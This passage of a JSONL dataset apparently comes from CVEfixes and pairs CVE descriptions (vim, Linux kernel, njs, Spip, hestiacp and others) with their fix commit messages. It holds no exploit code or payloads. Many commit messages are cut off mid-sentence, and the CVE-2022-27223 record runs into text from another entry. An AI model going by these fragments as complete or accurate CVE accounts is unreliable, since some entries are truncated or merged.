\r\nCo-authored-by: Linus Unnebäck ", "cve_id": "CVE-2022-2596", "source": "cvefixes", "timestamp": ""} {"id": "f91de431c7b5c384932f", "text": "CVE: CVE-2022-2598\n\n[{'lang': 'en', 'value': 'Undefined Behavior for Input to API in GitHub repository vim/vim prior to 9.0.0100.'}]\n\nFix commit: patch 9.0.0101: invalid memory access in diff mode with \"dp\" and undo\n\nProblem: Invalid memory access in diff mode with \"dp\" and undo.\nSolution: Make sure the line number does not go below one.", "cve_id": "CVE-2022-2598", "source": "cvefixes", "timestamp": ""} {"id": "1c9f238ae120a28346bc", "text": "CVE: CVE-2022-26183\n\n[{'lang': 'en', 'value': 'PNPM v6.15.1 and below was discovered to contain an untrusted search path which causes the application to behave in unexpected ways when users execute PNPM commands in a directory containing malicious content. This vulnerability occurs when the application is ran on Windows OS.'}]\n\nFix commit: fix: prevent binary planting attacks on Windows", "cve_id": "CVE-2022-26183", "source": "cvefixes", "timestamp": ""} {"id": "0ff83700229000ca4036", "text": "CVE: CVE-2022-2626\n\n[{'lang': 'en', 'value': 'Incorrect Privilege Assignment in GitHub repository hestiacp/hestiacp prior to 1.6.6.'}]\n\nFix commit: Fix security issues in v-add-web-domain-redirect + Sync up main with release (#2814)\n\n* Fix v-add-web-domain-redirect\r\n\r\n* Remove sudo permission admin group on new setups\r\n\r\nWe delete the group before install anyway\r\n\r\n* Block \"sudo\" from\r\n\r\n* Add missing slash\r\n\r\n* Update changelog\r\n\r\n* Update versions", "cve_id": "CVE-2022-2626", "source": "cvefixes", "timestamp": ""} {"id": "b2533b080df7dcee0ec9", "text": "CVE: CVE-2022-2636\n\n[{'lang': 'en', 'value': 'Improper Input Validation in GitHub repository hestiacp/hestiacp prior to 1.6.6.'}]\n\nFix commit: Fix security issues in v-add-web-domain-redirect + Sync up main with release (#2814)\n\n* Fix v-add-web-domain-redirect\r\n\r\n* Remove sudo permission admin group on new setups\r\n\r\nWe delete the group before install anyway\r\n\r\n* Block \"sudo\" from\r\n\r\n* Add missing slash\r\n\r\n* Update changelog\r\n\r\n* Update versions", "cve_id": "CVE-2022-2636", "source": "cvefixes", "timestamp": ""} {"id": "ef0e23688274e79ac478", "text": "CVE: CVE-2022-26490\n\n[{'lang': 'en', 'value': 'st21nfca_connectivity_event_received in drivers/nfc/st21nfca/se.c in the Linux kernel through 5.16.12 has EVT_TRANSACTION buffer overflows because of untrusted length parameters.'}]\n\nFix commit: nfc: st21nfca: Fix potential buffer overflows in EVT_TRANSACTION\n\nIt appears that there are some buffer overflows in EVT_TRANSACTION.\nThis happens because the length parameters that are passed to memcpy\ncome directly from skb->data and are not guarded in any", "cve_id": "CVE-2022-26490", "source": "cvefixes", "timestamp": ""} {"id": "27753dc36eecd21e1d70", "text": "CVE: CVE-2022-2651\n\n[{'lang': 'en', 'value': 'Authentication Bypass by Primary Weakness in GitHub repository bookwyrm-social/bookwyrm prior to 0.4.5.'}]\n\nFix commit: Merge pull request #2230 from bookwyrm-social/nginx-rate-limit\n\nAdds rate limiting to some views in nginx", "cve_id": "CVE-2022-2651", "source": "cvefixes", "timestamp": ""} {"id": "94dc812cc9d335ed027c", "text": "CVE: CVE-2022-2652\n\n[{'lang': 'en', 'value': \"Depending on the way the format strings in the card label are crafted it's possible to leak kernel stack memory. There is also the possibility for DoS due to the v4l2loopback kernel module crashing when providing the card label on request (reproduce e.g. with many %s modifiers in a row).\"}]\n\nFix commit: add explicit format specifier to printf() invocations\n\nCWE-134", "cve_id": "CVE-2022-2652", "source": "cvefixes", "timestamp": ""} {"id": "4e6914db61ab0e7b7334", "text": "CVE: CVE-2022-2653\n\n[{'lang': 'en', 'value': 'With this vulnerability an attacker can read many sensitive files like configuration files, or the /proc/self/environ file, that contains the environment variable used by the web server that includes database credentials. If the web server user is root, an attacker will be able to read any file in the system.'}]\n\nFix commit: fix: Fix path traversal vulnerability", "cve_id": "CVE-2022-2653", "source": "cvefixes", "timestamp": ""} {"id": "8ca0cb336dcde83260ea", "text": "CVE: CVE-2022-26530\n\n[{'lang': 'en', 'value': 'swaylock before 1.6 allows attackers to trigger a crash and achieve unlocked access to a Wayland compositor.'}]\n\nFix commit: Add support for ext-session-lock-v1\n\nThis is a new protocol to lock the session [1]. It should be more\nreliable than layer-shell + input-inhibitor.\n\n[1]: https://gitlab.freedesktop.org/wayland/wayland-protocols/-/merge_requests/131", "cve_id": "CVE-2022-26530", "source": "cvefixes", "timestamp": ""} {"id": "1353d4ec4a75fd22d39a", "text": "CVE: CVE-2022-26691\n\n[{'lang': 'en', 'value': 'A logic issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Monterey 12.3, macOS Big Sur 11.6.5. An application may be able to gain elevated privileges.'}]\n\nFix commit: scheduler/cert.c: Fix string comparison (fixes CVE-2022-26691)\n\nThe previous algorithm didn't expect the strings can have a different\nlength, so one string can be a substring of the other and such substring\nwas reported ", "cve_id": "CVE-2022-26691", "source": "cvefixes", "timestamp": ""} {"id": "7b8d9b76818f9d03d314", "text": "CVE: CVE-2022-26874\n\n[{'lang': 'en', 'value': 'lib/Horde/Mime/Viewer/Ooo.php in Horde Mime_Viewer before 2.2.4 allows XSS via an OpenOffice document, leading to account takeover in Horde Groupware Webmail Edition. This occurs after XSLT rendering.'}]\n\nFix commit: [jan] Fix XSS vulnerability in Open Document mime viewer with different code path (Reported by: Mahdi Pasche ).", "cve_id": "CVE-2022-26874", "source": "cvefixes", "timestamp": ""} {"id": "60d167df7349b2cab145", "text": "CVE: CVE-2022-26960\n\n[{'lang': 'en', 'value': 'connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.'}]\n\nFix commit: [security:CVE-2022-26960] fix a path traversal issue\n\nFixed a paste traversal vulnerability. The problem was getting out of\nthe configured directory and allowing the hosting serv", "cve_id": "CVE-2022-26960", "source": "cvefixes", "timestamp": ""} {"id": "eea6d5a92980a166ff45", "text": "CVE: CVE-2022-27007\n\n[{'lang': 'en', 'value': 'nginx njs 0.7.2 is affected suffers from Use-after-free in njs_function_frame_alloc() when it try to invoke from a restored frame saved with njs_function_frame_save().'}]\n\nFix commit: Fixed frame allocation from an awaited frame.\n\nnjs_function_frame_save() is used to save the awaited frame when \"await\"\ninstruction is encountered. The saving was done as a memcpy() of\nexisting runtime frame.\n\nnjs_function_frame_alloc() is used to alloc a new function ", "cve_id": "CVE-2022-27007", "source": "cvefixes", "timestamp": ""} {"id": "27577ccca11ebe5fa297", "text": "CVE: CVE-2022-27008\n\n[{'lang': 'en', 'value': 'nginx njs 0.7.2 is vulnerable to Buffer Overflow. Type confused in Array.prototype.concat() when a slow array appended element is fast array.'}]\n\nFix commit: Fixed Array.prototype.concat() when \"this\" is a slow array.\n\nPreviously, when the current appended element is fast array the \"this\"\narray was expected to always be a fast array also. This may not be the\ncase when the previous appended element was not fast thus converting\nthe \"this\" array to a ", "cve_id": "CVE-2022-27008", "source": "cvefixes", "timestamp": ""} {"id": "ee6f2eb15c865ad3e546", "text": "CVE: CVE-2022-27114\n\n[{'lang': 'en', 'value': \"There is a vulnerability in htmldoc 1.9.16. In image_load_jpeg function image.cxx when it calls malloc,'img->width' and 'img->height' they are large enough to cause an integer overflow. So, the malloc function may return a heap blosmaller than the expected size, and it will cause a buffer overflow/Address boundary error in the jpeg_read_scanlines function.\"}]\n\nFix commit: Fix a potential integer overflow bug in the JPEG and PNG loaders (Issue #471)\n", "cve_id": "CVE-2022-27114", "source": "cvefixes", "timestamp": ""} {"id": "6792667b437158980662", "text": "CVE: CVE-2022-2713\n\n[{'lang': 'en', 'value': 'Insufficient Session Expiration in GitHub repository cockpit-hq/cockpit prior to 2.2.0.'}]\n\nFix commit: Stop execution of code after redirecting", "cve_id": "CVE-2022-2713", "source": "cvefixes", "timestamp": ""} {"id": "54d331920c60ec3159bd", "text": "CVE: CVE-2022-27157\n\n[{'lang': 'en', 'value': 'pearweb < 1.32 is suffers from a Weak Password Recovery Mechanism via include/users/passwordmanage.php.'}]\n\nFix commit: Be cautious about what can be unserialized", "cve_id": "CVE-2022-27157", "source": "cvefixes", "timestamp": ""} {"id": "682923f595ccdd79f1b1", "text": "CVE: CVE-2022-27158\n\n[{'lang': 'en', 'value': 'pearweb < 1.32 suffers from Deserialization of Untrusted Data.'}]\n\nFix commit: Be cautious about what can be unserialized", "cve_id": "CVE-2022-27158", "source": "cvefixes", "timestamp": ""} {"id": "cd0ff277b21bbe94ae36", "text": "CVE: CVE-2022-27168\n\n[{'lang': 'en', 'value': 'Cross-site scripting vulnerability in LiteCart versions prior to 2.4.2 allows a remote attacker to inject an arbitrary script via unspecified vectors.'}]\n\nFix commit: * Escape HTML characters", "cve_id": "CVE-2022-27168", "source": "cvefixes", "timestamp": ""} {"id": "80dda33f0ac38a02050a", "text": "CVE: CVE-2022-27223\n\n[{'lang': 'en', 'value': 'In drivers/usb/gadget/udc/udc-xilinx.c in the Linux kernel before 5.16.12, the endpoint index is not validated and might be manipulated by the host for out-of-array access.'}]\n\nFix commit: USB: gadget: validate endpoint index for xilinx udc\n\nAssure that host may not manipulate the index to point\npast endpoint array.\n\nSigned-off-by: Szymon Heidrich \nCc: stable \nSigned-off-by: Greg Kroah-Hartman suffix being deallocated as heap memory as reported by Pietro Borrello.", "cve_id": "CVE-2022-28044", "source": "cvefixes", "timestamp": ""} {"id": "7afa47c5ffc4b7e2b595", "text": "CVE: CVE-2022-28049\n\n[{'lang': 'en', 'value': 'NGINX NJS 0.7.2 was discovered to contain a NULL pointer dereference via the component njs_vmcode_array at /src/njs_vmcode.c.'}]\n\nFix commit: Fixed allocation of large array literals.\n\nPreviously, allocation of large array literals may result in\nnull-pointer dereference. The reason is that njs_array_alloc() may\nreturn a slow array when size is large enough, but the instruction\ncode assumes that array is always flat.\n\nThe fix is to check fast_array f", "cve_id": "CVE-2022-28049", "source": "cvefixes", "timestamp": ""} {"id": "d486f1a59cdc400579de", "text": "CVE: CVE-2022-28055\n\n[{'lang': 'en', 'value': 'Fusionpbx v4.4 and below contains a command injection vulnerability via the download email logs function.'}]\n\nFix commit: Remove email_logs download. (#6331)\n\n* Remove email_logs download.\r\n\r\nThis feature has a security risk that is being eliminated by removing the download feature.\r\n\r\n* Update email_logs.php", "cve_id": "CVE-2022-28055", "source": "cvefixes", "timestamp": ""} {"id": "46b3d68ea3868cd871c3", "text": "CVE: CVE-2022-28085\n\n[{'lang': 'en', 'value': 'A flaw was found in htmldoc commit 31f7804. A heap buffer overflow in the function pdf_write_names in ps-pdf.cxx may lead to arbitrary code execution and Denial of Service (DoS).'}]\n\nFix commit: Call check_pages when writing links (Issue #480)", "cve_id": "CVE-2022-28085", "source": "cvefixes", "timestamp": ""} {"id": "8d5ecd04fb3e5d291f6a", "text": "CVE: CVE-2022-2816\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.0212.'}]\n\nFix commit: patch 9.0.0212: invalid memory access when compiling :unlet\n\nProblem: Invalid memory access when compiling :unlet.\nSolution: Don't read past the end of the line.", "cve_id": "CVE-2022-2816", "source": "cvefixes", "timestamp": ""} {"id": "255e9f709f5844f3eb1b", "text": "CVE: CVE-2022-2817\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.0213.'}]\n\nFix commit: patch 9.0.0213: using freed memory with error in assert argument\n\nProblem: Using freed memory with error in assert argument.\nSolution: Make a copy of the error.", "cve_id": "CVE-2022-2817", "source": "cvefixes", "timestamp": ""} {"id": "72ae769a65b59371eddc", "text": "CVE: CVE-2022-2818\n\n[{'lang': 'en', 'value': 'Authentication Bypass by Primary Weakness in GitHub repository cockpit-hq/cockpit prior to 2.2.2.'}]\n\nFix commit: Fix exposing 2FA secret in JWT token on login", "cve_id": "CVE-2022-2818", "source": "cvefixes", "timestamp": ""} {"id": "81994b326683ba53e13a", "text": "CVE: CVE-2022-2819\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0211.'}]\n\nFix commit: patch 9.0.0211: invalid memory access when compiling :lockvar\n\nProblem: Invalid memory access when compiling :lockvar.\nSolution: Don't read past the end of the line.", "cve_id": "CVE-2022-2819", "source": "cvefixes", "timestamp": ""} {"id": "a1e0e128bebef0297cc9", "text": "CVE: CVE-2022-2820\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository namelessmc/nameless prior to v2.0.2.'}]\n\nFix commit: Rework user sessions system (#3000)\n\nCo-authored-by: samerton ", "cve_id": "CVE-2022-2820", "source": "cvefixes", "timestamp": ""} {"id": "5203cfbab71c46ebdfd3", "text": "CVE: CVE-2022-2821\n\n[{'lang': 'en', 'value': 'Missing Critical Step in Authentication in GitHub repository namelessmc/nameless prior to v2.0.2.'}]\n\nFix commit: Add ability to rate limit via Validate class (#2998)", "cve_id": "CVE-2022-2821", "source": "cvefixes", "timestamp": ""} {"id": "cb3eebc627c0852a93b1", "text": "CVE: CVE-2022-2824\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.1.'}]\n\nFix commit: bug fix and php8.1 fixes (#5664)\n\n* bug fix and php8.1 fixes\r\n\r\n* styling", "cve_id": "CVE-2022-2824", "source": "cvefixes", "timestamp": ""} {"id": "946f0b4b9e151d27a11a", "text": "CVE: CVE-2022-28356\n\n[{'lang': 'en', 'value': 'In the Linux kernel before 5.17.1, a refcount leak bug was found in net/llc/af_llc.c.'}]\n\nFix commit: llc: fix netdevice reference leaks in llc_ui_bind()\n\nWhenever llc_ui_bind() and/or llc_ui_autobind()\ntook a reference on a netdevice but subsequently fail,\nthey must properly release their reference\nor risk the infamous message from unregister_netdevice()\nat device dismantle.\n\nunregister_netdevice: waiting for eth0 to become free. Usage count = 3\n\nF", "cve_id": "CVE-2022-28356", "source": "cvefixes", "timestamp": ""} {"id": "3e297b5d65a9a41131cf", "text": "CVE: CVE-2022-28367\n\n[{'lang': 'en', 'value': 'OWASP AntiSamy before 1.6.6 allows XSS via HTML tag smuggling on STYLE content with crafted input. The output serializer does not properly encode the supposed Cascading Style Sheets (CSS) content.'}]\n\nFix commit: Support multiple children handling on style tags", "cve_id": "CVE-2022-28367", "source": "cvefixes", "timestamp": ""} {"id": "97aebfa479f0da06290c", "text": "CVE: CVE-2022-28368\n\n[{'lang': 'en', 'value': 'Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file).'}]\n\nFix commit: Match installed font filename extension to type\n\nfixes #2598", "cve_id": "CVE-2022-28368", "source": "cvefixes", "timestamp": ""} {"id": "03d471bcf8944b0350f6", "text": "CVE: CVE-2022-28388\n\n[{'lang': 'en', 'value': 'usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c in the Linux kernel through 5.17.1 has a double free.'}]\n\nFix commit: can: usb_8dev: usb_8dev_start_xmit(): fix double dev_kfree_skb() in error path\n\nThere is no need to call dev_kfree_skb() when usb_submit_urb() fails\nbecause can_put_echo_skb() deletes original skb and\ncan_free_echo_skb() deletes the cloned skb.\n\nFixes: 0024d8ad1639 (\"can: usb_8dev: Add support for USB2CAN interface from 8 devic", "cve_id": "CVE-2022-28388", "source": "cvefixes", "timestamp": ""} {"id": "ffeb309fdb20ab494143", "text": "CVE: CVE-2022-28389\n\n[{'lang': 'en', 'value': 'mcba_usb_start_xmit in drivers/net/can/usb/mcba_usb.c in the Linux kernel through 5.17.1 has a double free.'}]\n\nFix commit: can: mcba_usb: mcba_usb_start_xmit(): fix double dev_kfree_skb in error path\n\nThere is no need to call dev_kfree_skb() when usb_submit_urb() fails\nbecause can_put_echo_skb() deletes original skb and\ncan_free_echo_skb() deletes the cloned skb.\n\nFixes: 51f3baad7de9 (\"can: mcba_usb: Add support for Microchip CAN BUS Analyzer\")\nLin", "cve_id": "CVE-2022-28389", "source": "cvefixes", "timestamp": ""} {"id": "76476d6b8cf1c54d2b66", "text": "CVE: CVE-2022-28390\n\n[{'lang': 'en', 'value': 'ems_usb_start_xmit in drivers/net/can/usb/ems_usb.c in the Linux kernel through 5.17.1 has a double free.'}]\n\nFix commit: can: ems_usb: ems_usb_start_xmit(): fix double dev_kfree_skb() in error path\n\nThere is no need to call dev_kfree_skb() when usb_submit_urb() fails\nbeacause can_put_echo_skb() deletes the original skb and\ncan_free_echo_skb() deletes the cloned skb.\n\nLink: https://lore.kernel.org/all/20220228083639.38183-1-hbh25y@gmail.com\nFixes: 7", "cve_id": "CVE-2022-28390", "source": "cvefixes", "timestamp": ""} {"id": "098eb5b628805ae74853", "text": "CVE: CVE-2022-2845\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository vim/vim prior to 9.0.0218.'}]\n\nFix commit: patch 9.0.0218: reading before the start of the line\n\nProblem: Reading before the start of the line.\nSolution: When displaying \"$\" check the column is not negative.", "cve_id": "CVE-2022-2845", "source": "cvefixes", "timestamp": ""} {"id": "e9ac12985d35f715f564", "text": "CVE: CVE-2022-28451\n\n[{'lang': 'en', 'value': 'nopCommerce 4.50.1 is vulnerable to Directory Traversal via the backup file in the Maintenance feature.'}]\n\nFix commit: Fixed a possible issue with database backup filenames", "cve_id": "CVE-2022-28451", "source": "cvefixes", "timestamp": ""} {"id": "0fe8d3d81190a98a6112", "text": "CVE: CVE-2022-28463\n\n[{'lang': 'en', 'value': 'ImageMagick 7.1.0-27 is vulnerable to Buffer Overflow.'}]\n\nFix commit: https://github.com/ImageMagick/ImageMagick/issues/4988", "cve_id": "CVE-2022-28463", "source": "cvefixes", "timestamp": ""} {"id": "38c682443d0695641b55", "text": "CVE: CVE-2022-2849\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0220.'}]\n\nFix commit: patch 9.0.0220: invalid memory access with for loop over NULL string\n\nProblem: Invalid memory access with for loop over NULL string.\nSolution: Make sure mb_ptr2len() consistently returns zero for NUL.", "cve_id": "CVE-2022-2849", "source": "cvefixes", "timestamp": ""} {"id": "e2cc3353444523d6a028", "text": "CVE: CVE-2022-28545\n\n[{'lang': 'en', 'value': 'FUDforum 3.1.1 is vulnerable to Stored XSS.'}]\n\nFix commit: Fix XSS vulnerability reported by ptsecurity.com (attacker tries to send mail to an administrator\non a server that does not have a mail server configured).", "cve_id": "CVE-2022-28545", "source": "cvefixes", "timestamp": ""} {"id": "a49ed75e8ae8eea05efd", "text": "CVE: CVE-2022-28545\n\n[{'lang': 'en', 'value': 'FUDforum 3.1.1 is vulnerable to Stored XSS.'}]\n\nFix commit: Fix stored XSS vulnerability reported by ptsecurity.com", "cve_id": "CVE-2022-28545", "source": "cvefixes", "timestamp": ""} {"id": "c7a8804410135c667328", "text": "CVE: CVE-2022-2862\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.0221.'}]\n\nFix commit: patch 9.0.0221: accessing freed memory if compiling nested function fails\n\nProblem: Accessing freed memory if compiling nested function fails.\nSolution: Mess up the variable name so that it won't be found.", "cve_id": "CVE-2022-2862", "source": "cvefixes", "timestamp": ""} {"id": "f64ca5def1001405eacb", "text": "CVE: CVE-2022-2871\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository notrinos/notrinoserp prior to 0.7.'}]\n\nFix commit: Prevent cross-site scripting(XSS) vulnerabilities.", "cve_id": "CVE-2022-2871", "source": "cvefixes", "timestamp": ""} {"id": "85b72eb6109303c1c16b", "text": "CVE: CVE-2022-2874\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.0224.'}]\n\nFix commit: patch 9.0.0224: Using NULL pointer when skipping compiled code\n\nProblem: Using NULL pointer when skipping compiled code.\nSolution: Check for skipping.", "cve_id": "CVE-2022-2874", "source": "cvefixes", "timestamp": ""} {"id": "09d77b3325752322d54e", "text": "CVE: CVE-2022-28796\n\n[{'lang': 'en', 'value': 'jbd2_journal_wait_updates in fs/jbd2/transaction.c in the Linux kernel before 5.17.1 has a use-after-free caused by a transaction_t race condition.'}]\n\nFix commit: jbd2: fix use-after-free of transaction_t race\n\njbd2_journal_wait_updates() is called with j_state_lock held. But if\nthere is a commit in progress, then this transaction might get committed\nand freed via jbd2_journal_commit_transaction() ->\njbd2_journal_free_transaction(), when we release", "cve_id": "CVE-2022-28796", "source": "cvefixes", "timestamp": ""} {"id": "3a2c2d841bfbc2d23e70", "text": "CVE: CVE-2022-28805\n\n[{'lang': 'en', 'value': 'singlevar in lparser.c in Lua from (including) 5.4.0 up to (excluding) 5.4.4 lacks a certain luaK_exp2anyregup call, leading to a heap-based buffer over-read that might affect a system that compiles untrusted Lua code.'}]\n\nFix commit: Bug: Lua can generate wrong code when _ENV is ", "cve_id": "CVE-2022-28805", "source": "cvefixes", "timestamp": ""} {"id": "fdb27345f8b594fde292", "text": "CVE: CVE-2022-2885\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0.'}]\n\nFix commit: Improved input data cleanup", "cve_id": "CVE-2022-2885", "source": "cvefixes", "timestamp": ""} {"id": "eaf56a0417cdbea6e747", "text": "CVE: CVE-2022-2889\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.0225.'}]\n\nFix commit: patch 9.0.0225: using freed memory with multiple line breaks in expression\n\nProblem: Using freed memory with multiple line breaks in expression.\nSolution: Free eval_tofree later.", "cve_id": "CVE-2022-2889", "source": "cvefixes", "timestamp": ""} {"id": "5fc0b469ccf6d10b4843", "text": "CVE: CVE-2022-28927\n\n[{'lang': 'en', 'value': 'A remote code execution (RCE) vulnerability in Subconverter v0.7.2 allows attackers to execute arbitrary code via crafted config and url parameters.'}]\n\nFix commit: Enhancements\n\nAdd authorization check before loading scripts.\nAdd detailed logs when loading preference settings.", "cve_id": "CVE-2022-28927", "source": "cvefixes", "timestamp": ""} {"id": "5831c7fa5e4e4d19e645", "text": "CVE: CVE-2022-28946\n\n[{'lang': 'en', 'value': 'An issue in the component ast/parser.go of Open Policy Agent v0.39.0 causes the application to incorrectly interpret every expression, causing a Denial of Service (DoS) via triggering out-of-range memory access.'}]\n\nFix commit: ast/parser: guard against invalid domains for \"some\" and \"every\" (#4548)\n\nThese would cause a runtime exception when attempting to parse\r\n\r\n some internal.member_2()\r\n\r\nThis is due to a technicality in how\r\n\r\n some x in", "cve_id": "CVE-2022-28946", "source": "cvefixes", "timestamp": ""} {"id": "c818e69a006f5830bce3", "text": "CVE: CVE-2022-28959\n\n[{'lang': 'en', 'value': 'Multiple cross-site scripting (XSS) vulnerabilities in the component /spip.php of Spip Web Framework v3.1.13 and below allows attackers to execute arbitrary web scripts or HTML.'}]\n\nFix commit: Divers petites sanitization et une balise manquante #4494", "cve_id": "CVE-2022-28959", "source": "cvefixes", "timestamp": ""} {"id": "6c62f3e2f2238e84616b", "text": "CVE: CVE-2022-28959\n\n[{'lang': 'en', 'value': 'Multiple cross-site scripting (XSS) vulnerabilities in the component /spip.php of Spip Web Framework v3.1.13 and below allows attackers to execute arbitrary web scripts or HTML.'}]\n\nFix commit: _oups donc (aka un base64_encode ca fait pas de mal)", "cve_id": "CVE-2022-28959", "source": "cvefixes", "timestamp": ""} {"id": "cf18c62f6b46309692fb", "text": "CVE: CVE-2022-28960\n\n[{'lang': 'en', 'value': 'A PHP injection vulnerability in Spip before v3.2.8 allows attackers to execute arbitrary PHP code via the _oups parameter at /ecrire.'}]\n\nFix commit: Divers petites sanitization et une balise manquante #4494", "cve_id": "CVE-2022-28960", "source": "cvefixes", "timestamp": ""} {"id": "4b41e63630cc53f83811", "text": "CVE: CVE-2022-28960\n\n[{'lang': 'en', 'value': 'A PHP injection vulnerability in Spip before v3.2.8 allows attackers to execute arbitrary PHP code via the _oups parameter at /ecrire.'}]\n\nFix commit: _oups donc (aka un base64_encode ca fait pas de mal)", "cve_id": "CVE-2022-28960", "source": "cvefixes", "timestamp": ""} {"id": "a8a5374dd05369c06cb3", "text": "CVE: CVE-2022-28961\n\n[{'lang': 'en', 'value': 'Spip Web Framework v3.1.13 and below was discovered to contain multiple SQL injection vulnerabilities at /ecrire via the lier_trad and where parameters.'}]\n\nFix commit: Divers petites sanitization et une balise manquante #4494", "cve_id": "CVE-2022-28961", "source": "cvefixes", "timestamp": ""} {"id": "8d6d9a4e831fddab3fcd", "text": "CVE: CVE-2022-28961\n\n[{'lang': 'en', 'value': 'Spip Web Framework v3.1.13 and below was discovered to contain multiple SQL injection vulnerabilities at /ecrire via the lier_trad and where parameters.'}]\n\nFix commit: _oups donc (aka un base64_encode ca fait pas de mal)", "cve_id": "CVE-2022-28961", "source": "cvefixes", "timestamp": ""} {"id": "8b86b30945bcddfc1976", "text": "CVE: CVE-2022-29156\n\n[{'lang': 'en', 'value': 'drivers/infiniband/ulp/rtrs/rtrs-clt.c in the Linux kernel before 5.16.12 has a double free related to rtrs_clt_dev_release.'}]\n\nFix commit: RDMA/rtrs-clt: Fix possible double free in error case\n\nCallback function rtrs_clt_dev_release() for put_device() calls kfree(clt)\nto free memory. We shouldn't call kfree(clt) again, and we can't use the\nclt after kfree too.\n\nReplace device_register() with device_initialize() and device_add() so that\ndev_set_nam", "cve_id": "CVE-2022-29156", "source": "cvefixes", "timestamp": ""} {"id": "7ceff8bc6f4bc49a8171", "text": "CVE: CVE-2022-29161\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. The XWiki Crypto API will generate X509 certificates signed by default using SHA1 with RSA, which is not considered safe anymore for use in certificate signatures, due to the risk of collisions with SHA1. The problem has been patched in XWiki version 13.10.6, 14.3.1 and 14.4-rc-1. Since then, the Crypto API will generate X509 certificates signed ", "cve_id": "CVE-2022-29161", "source": "cvefixes", "timestamp": ""} {"id": "edc1659d5611c42ab9e4", "text": "CVE: CVE-2022-29162\n\n[{'lang': 'en', 'value': \"runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. A bug was found in runc prior to version 1.1.2 where `runc exec --cap` created processes with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during execve(2). This bug did not affect the container securi", "cve_id": "CVE-2022-29162", "source": "cvefixes", "timestamp": ""} {"id": "2441fb416c9df66e000d", "text": "CVE: CVE-2022-29164\n\n[{'lang': 'en', 'value': 'Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. In affected versions an attacker can create a workflow which produces a HTML artifact containing an HTML file that contains a script which uses XHR calls to interact with the Argo Server API. The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running. As the script has access to", "cve_id": "CVE-2022-29164", "source": "cvefixes", "timestamp": ""} {"id": "5b8f521b323d8e2465e4", "text": "CVE: CVE-2022-29172\n\n[{'lang': 'en', 'value': \"Auth0 is an authentication broker that supports both social and enterprise identity providers, including Active Directory, LDAP, Google Apps, and Salesforce. In versions before `11.33.0`, when the “additional signup fieldsâ€? feature [is configured](https://github.com/auth0/lock#additional-sign-up-fields), a malicious actor can inject invalidated HTML code into these additional fields, which is then stored in the service `user_metdata` payload (us", "cve_id": "CVE-2022-29172", "source": "cvefixes", "timestamp": ""} {"id": "1eb25c382356db9e5dd8", "text": "CVE: CVE-2022-29173\n\n[{'lang': 'en', 'value': 'go-tuf is a Go implementation of The Update Framework (TUF). go-tuf does not correctly implement the client workflow for updating the metadata files for roles other than the root role. Specifically, checks for rollback attacks are not implemented correctly meaning an attacker can cause clients to install software that is older than the software which the client previously knew to be available, and may include software with known vulnerabilities. In ", "cve_id": "CVE-2022-29173", "source": "cvefixes", "timestamp": ""} {"id": "3612285dfde643c3ac8c", "text": "CVE: CVE-2022-29174\n\n[{'lang': 'en', 'value': 'countly-server is the server-side part of Countly, a product analytics solution. Prior to versions 22.03.7 and 21.11.4, a malicious actor who knows an account email address/username and full name specified in the database is capable of guessing the password reset token. The actor may use this information to reset the password and take over the account. The problem has been patched in Countly Server version 22.03.7 for servers using the new user inte", "cve_id": "CVE-2022-29174", "source": "cvefixes", "timestamp": ""} {"id": "88e0d5f7408167aab11b", "text": "CVE: CVE-2022-29180\n\n[{'lang': 'en', 'value': \"A vulnerability in which attackers could forge HTTP requests to manipulate the `charm` data directory to access or delete anything on the server. This has been patched and is available in release [v0.12.1](https://github.com/charmbracelet/charm/releases/tag/v0.12.1). We recommend that all users running self-hosted `charm` instances update immediately. This vulnerability was found in-house and we haven't been notified of any potential exploiters. ###", "cve_id": "CVE-2022-29180", "source": "cvefixes", "timestamp": ""} {"id": "8aea4702c1bd4d4d751d", "text": "CVE: CVE-2022-29181\n\n[{'lang': 'en', 'value': 'Nokogiri is an open source XML and HTML library for Ruby. Nokogiri prior to version 1.13.6 does not type-check all inputs into the XML and HTML4 SAX parsers, allowing specially crafted untrusted inputs to cause illegal memory access errors (segfault) or reads from unrelated memory. Version 1.13.6 contains a patch for this issue. As a workaround, ensure the untrusted input is a `String` by calling `#to_s` or equivalent.'}]\n\nFix commit: fix: {HTML4,XM", "cve_id": "CVE-2022-29181", "source": "cvefixes", "timestamp": ""} {"id": "7402d9d9fd36a341997a", "text": "CVE: CVE-2022-29184\n\n[{'lang': 'en', 'value': 'GoCD is a continuous delivery server. In GoCD versions prior to 22.1.0, it is possible for existing authenticated users who have permissions to edit or create pipeline materials or pipeline configuration repositories to get remote code execution capability on the GoCD server via configuring a malicious branch name which abuses Mercurial hooks/aliases to exploit a command injection weakness. An attacker would require access to an account with existin", "cve_id": "CVE-2022-29184", "source": "cvefixes", "timestamp": ""} {"id": "07b437d9f63d09635e33", "text": "CVE: 